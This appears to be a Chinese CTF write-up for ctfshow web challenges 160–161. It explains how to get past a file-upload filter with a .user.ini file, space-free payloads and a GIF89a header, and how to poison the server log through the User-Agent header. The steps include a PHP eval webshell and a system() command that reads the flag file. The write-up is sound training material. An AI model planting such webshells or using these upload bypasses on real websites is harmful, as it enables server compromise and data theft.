ctf show web入门160 161

这道题跟前几题差不多增加了一个对 空格的限制

所以我们在写木马文件的时候只需要注意不要加上空格就好

这道题我们还是先上传user.ini文件

然后上传我们编写的木马文件,记得检查有没有空格

如果不确定自己的木马文件是否能上传成功就可以先发到repeater重放器里面如果resopnse中最后一行的结果类似与{"code":0,"msg":"upload/MM.png"}说明上传成功

此时我们就可以访问upload目录

然后在打开一个原来题目的网址,写入一个1.txt,并给它加上一个user-agent内容为:<?php eval($_POST1);?>

写好后点击execute运行,使其写入该网站的日志文件中

接下来回到upload目录下

开启POSTmethod进行命令执行

payload为:1=system('tac .../flag.php');

执行后在当前页面就可以看到flag了

161对文件的内容进行进一步限制,需要在前面限制条件的基础上再加上一个图片的头文件

我们要在user.ini文件和木马文件前加上一个GIF89a来绕过限制

因为GIF89a是一种图像文件格式的标准,所以可以在检验上传文件内容的时候绕过限制,使我们的攻击代码能够上传成功

相关推荐
GuWenyue3 小时前
放弃云端API!一套React+WebGPU本地LLM方案,零数据上传、离线可用
前端·人工智能·前端框架
原则猫4 小时前
函数/变量提升
前端
独泪了无痕5 小时前
Vue3 Hooks使用实战解析
前端·vue.js
shawxlee6 小时前
vue3在public下封装config.js自定义配置动态数据,可在打包后直接修改,方便后端部署及后续维护
前端·javascript·经验分享·vue·团队开发·js·项目优化
用户059540174467 小时前
把记忆存储的回归测试从手工换成 Playwright + GitHub Actions,线上缺陷降低 80%
前端·css
触底反弹7 小时前
🚀 从 DOM0 级到 React 合成事件:前端事件监听的 20 年演进史
前端·react.js·面试
kyriewen7 小时前
我给前端项目的接口请求套了6层保护——才发现以前一直在裸奔
前端·javascript·面试
颜酱7 小时前
04 | 召回前置准备:搭好召回所需的四个数据库
前端·人工智能·后端
郝亚军8 小时前
如何安装webstorm、Node.js和vue CLI
前端·javascript·vue.js
IT_陈寒8 小时前
React的useEffect依赖项把我坑惨了
前端·人工智能·后端